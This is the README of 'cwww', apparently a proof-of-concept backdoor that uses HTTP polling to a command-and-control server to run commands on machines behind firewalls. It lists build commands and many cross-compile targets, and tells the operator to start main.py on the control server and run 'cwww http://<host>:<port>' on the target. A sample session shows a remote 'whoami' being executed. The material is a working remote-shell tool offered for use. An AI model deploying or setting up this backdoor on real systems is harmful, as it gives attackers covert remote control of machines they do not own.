There is no way to win without losing first

A proof-of-concept of placing backdoors behind firewalls using HTTP communication with command & control server. This tool uses HTTP requests to fetch commands and return output to a control server.

Building

make TARGET=<target>

NOTE: For macOS / iOS targets you are required to set SDK to the desired SDK path before running make. For example:

make TARGET=<target> SDK=<path>

You can find list of supported TARGET values for different platforms.

Linux

aarch64-linux-musl
armv5l-linux-musleabi
i486-linux-musl
x86_64-linux-musl
powerpc-linux-muslsf
powerpc64le-linux-musl
mips-linux-muslsf
mipsel-linux-muslsf
mips64-linux-musl
s390x-linux-musl

Windows

x86_64-w64-mingw32
x86_64-w64-mingw32

macOS / iOS

arm-iphone-darwin
aarch64-iphone-darwin
i386-apple-darwin
x86_64-apple-darwin
aarch64-apple-darwin

Usage

1. Execute main.py <host> <port> on command & control server
2. Execute cwww http://<host>:<port> on target system

Example:

Welcome to the cwww-shell v1.0 by Ivan Nikolskiy / enty8080

Introduction: Wait for your client to connect, examine it's output and then
              type in your commands to execute on client. You'll have to
              wait some time between commands. Use ";" for multiple commands.
              Trying to execute interactive commands may give you headache
              so beware. You also shouldn't try to view binary data too.
              "echo bla >> file", "cat >> file <<- EOF", sed etc. are your
              friends if you don't like using vi in a delayed line mode.
              To exit this program on any time without doing harm to either
              server or client just type "quit".


Waiting for connect ... connect from 127.0.0.1:50194

$ whoami
sent.


Waiting for connect ... connect from 127.0.0.1:50195

felix

Waiting for connect ... connect from 127.0.0.1:50197

$